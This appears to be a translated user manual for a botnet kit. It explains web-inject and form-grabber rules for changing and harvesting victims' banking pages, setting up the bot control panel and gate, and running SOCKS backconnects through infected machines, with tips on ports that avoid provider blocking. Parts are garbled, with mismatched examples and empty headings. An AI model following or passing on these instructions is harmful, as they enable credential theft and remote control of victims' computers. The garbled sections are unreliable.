User guide

Description: Bot

Description: Control panel

Configuration file: HTTP-inject/HTTP-grabber.

For the convenience of writing, HTTP-inject/HTTP-grabber are recorded in a separate file specified in the configuration file as "DynamicConfig.file_webinjects". Naturally, after creating the end-configuration file, not any additional files are generated.

The file consists of a list of URLs for which you can specify an unlimited number of any modification thereto or derived from their data. The current URL is the following line:

set_url [url] [options] [postdata_blacklist] [postdata_whitelist] [url_block] [matched_context]

Parameters:

url URL, on which must be run HTTP-inject/HTTP-grabber. Allowed the use of masks (* and # symbols).
options Defines basic terms and conditions for the records, consists of a combination of the following characters:
  • P - runs at POST-request.
  • G - runs at GET-request.
  • L - if this symbol is specified, then starts going as HTTP-grabber, if not specified, goes as HTTP-inject.
  • D - blocks run more than once in 24 hours. This symbol requires a mandatory presence of the parameter url_block.
  • F - complements the symbol "L", allows you to record the result not in the full report but as a separated file "grabbed\%host%_%year%_%month%_%day%.txt".
  • H - complements the symbol "L", saves the contents without stripping the HTML-tags. In normal mode the same, all HTML-tags are removed, and some are transformed into a character "new line" or "gap".
  • I - compare the url parameter insensitive (only for engl. alphabet).
  • C - compare the context insensitive (only for engl. alphabet).
postdata_blacklist Complete (from beginning to end) the contents of POST-data, which should not be run. Allowed the use of masks (* and ? symbols).

Parameter is optional.
postdata_whitelist Full (from beginning to end) content POST-data, which should be run. Allowed the use of masks (* and ? symbols).

Parameter is optional.
url_block In the absence of the symbol "D" in the options parameter:

If the run must occur only once, then should be specified a URL, in this case the further run will be blocked. Expects that URL to begin immediately after HTTP-inject/HTTP-grabber application. If, after blocking will need rerun, then the lock can be removed via the command "bot_httpinject_enable" with a parameter, for example, equal to the parameter url.

In the presence of the symbol "D" in the options parameter:

You must specify a URL, when referring to that, run will be locked at 24-th hour. Expectats that the URL begins immediately after HTTP-inject/HTTP-grabber application. This lock can not be removed by a command "bot_httpinject_enable".

Parameter is optional in the absence of a symbol "D" in the options parameter.
matched_context Subcontent (substring) URL content, which should be run. Allows the use of masks (* and ? symbols).

Parameter is optional.

With the next line begins a list of changes introduced in the contents of the URL, and if the symbol "L" is in the parameter options - a list of data is retrieved from the content URL. This list lasts until it reaches the end of the file, or is specified a new URL.

Unit list consists of three elements in random order:

data_before In the absence of the symbol "L" in the options parameter:

Subcontent in the URL content, after which you want to enter new data.

In the presence of the symbol "L" in the options parameter:

Subcontent in the URL content, after which you want to start to get data for the report.

Allows the use of masks (* and ? symbols).
data_after In the absence of the symbol "L" in the options parameter:

Subcontent in the URL content, to which you want to finish the new data.

In the presence of the symbol "L" in the options parameter:

Subcontent in the URL content, after which the need to finish getting the data for the report.

Allows the use of masks (* and ? symbols).
data_inject In the absence of the symbol "L" in the options parameter:

The new data, that will be inserted between data_before and data_after data.

In the presence of the symbol "L" in the options parameter:

Subcontent in the URL content, after which the need to finish getting the data for the report.

Example:

user_homepage_set http://www.google.com/ Force setting the homepage as "http://www.google.com/".
user_homepage_set Force setting the homepage will be disabled.
LIMITS LOGIC FOR INCOMPLETE before or after

Control panel: Server configuration

The server is the central point of control the botnet, it is engaged in collecting reports of bots and command bots. It is not recommended to use "Virtual Hosting" or "VDS", as with an increase in the botnet, the server will increase, and this kind of web hosting quickly exhaust its resources. You need a "Dedicated Server" (Ded), the recommended minimum configuration:

For bot to work requires HTTP-server with PHP + Zend Optimizer attached, and MySQL-server.
WARNING: For Windows-based servers is very important to change (create) the following registry value: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\MaxUserPort=dword:65534 (decimal).

Control panel: Installation

Designation of files and folders:

/installinstaller
/systemsystem files
/system/fsarc.phpscript to call an external archiver
/system/config.phpconfiguration file
/themetheme files (design), without Zend, can freely change
cp.phpcontrol panel entrance
gate.phpgate for bots
index.phpempty file to prevent listing of files

The control panel is usually located in your distribution folder server[php]. All contents of this folder is for upload to the server in any location accessible via HTTP. If you upload it via FTP, all files must be uploaded in BINARY mode.

For nix-systems set rights:

/.777
/system777
/tmp777

For Windows-systems set rights:

\systemrights to full rights for reading, writing for an unprivileged user which is used to access the files via HTTP. For IIS it is usually IUSR_*
\tmpas well as for \system

Once all files are uploaded and are set the rights, need to run in the browser the installer from URL http://server/directory/install/index.php. Follow the on-screen instructions, in case of errors (You will be notified in detail) in the installation process, check the entered data, and proper rights setting to the folder.

After installing, is recommended to remove the install directory, and rename files cp.php (control panel entrance) and gate.php (gate for bots) to any files you like (the extension cannot be changed).

Now you can safely enter into the control panel by typing in the browser URL the renamed file cp.php.

Control panel: Update

If you have a newer copy of the control panel, and want to update an older version, you must do the following:

  1. Copy the files of the new panel in place of the old.
  2. Rename the files cp.php and gate.php under their real names you selected when you installed the old control panel.
  3. Just in case, re-set the directories rights under this section.
  4. Run the installer throuh a browser URL http://сервер/директория/install/index.php, and follow the on-screen instructions. The process of the installer may take quite a long period of time, due to the fact that some of the tables with the reports can be recreated.
  5. You can use the new control panel.

Control panel: The file /system/fsarc.php.

This file contains a function to call an external archiver. Currently, data logger is used only in the module "Reports::Find in files" (reports_files), and calls to download files and folders in a single archive. By default, configured to Zip archiver, and is universal for both Windows and nix, so all you have to do, is to install into the system this archiver, and give the right to its execution. You can also edit this file to work with any archiver.

Download Zip: http://www.info-zip.org/Zip.html.

Control panel: Commands, used in scripts

Working with the Backonnect-server

Working with the BackConnect with example.

  1. Run a server application (zsbcs.exe or zsbcs64.exe) on the server having its own IP-address on the Internet, for application indicated port, which waits for a connection from a bot, and the port which will connect the client application. For example zsbcs.exe listen -cp:1080 -bp:4500, where 1080 - client port, 4500 - port for the bot.

  2. Necessary to send command to bot "bot_bc_add socks 192.168.100.1 4500".

  3. Now you need to wait for a connection from the bot to the server, in this period, any attempt to connect the client application will be ignored (will take disconnect from the client). The sign of the connected bot will be output to the console server line "Accepted new conection from bot...".

  4. After connecting the bot, you can work with your client application. I.e. You simply connect to the server to the client port (in this case 1080). For example, if you are giving socks commands, then on the client port you would expect Socks-server.

  5. After that, when you do not need Backconnect from the bot for a specific service, should issue the command "bot_bc_remove socks 192.168.100.1 4500".

NOTES:

  1. You can specify any number of Backconnects (i.e. bot_bc_add), but they should not be a common combination of IP + Port. But if there is such a combination, will run the first added.
  2. For each Backconnect, you must run a separate server application.
  3. In case of disconnection (server down, drop bot, etc.), the bot will reconnect to the server indefinitely (even after restarting PC), until Backconnect will not be removed (i.e. bot_bc_remove).
  4. As a service for bot_bc_add, you can use any open port at the address 127.0.0.1.
  5. Server application supports IPv6, but currently this support is not particularly relevant.
  6. You can launch the server application under Wine. Writing the same elf application is not currently scheduled.
  7. It is highly recommended to use for the bp server application popular ports (80, 8080, 443 etc.), i.e. other ports may be blocked by the provider that owns the bot.
  8. Not to be allowed to subscribe different bots on one and the same server port at the same time.
  9. The method of such a connection might be useful for bots, which are outside the NAT, i.e. sometimes WIndows firewall of providers, may block the Internet connection.

F.A.Q.

Version history